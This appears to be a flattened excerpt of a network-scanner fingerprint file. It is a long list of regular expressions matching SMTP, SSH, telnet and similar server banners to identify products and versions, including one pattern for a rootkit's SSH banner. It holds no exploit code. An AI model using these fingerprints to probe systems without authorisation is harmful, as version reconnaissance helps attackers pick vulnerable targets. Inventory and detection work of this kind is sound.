YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: 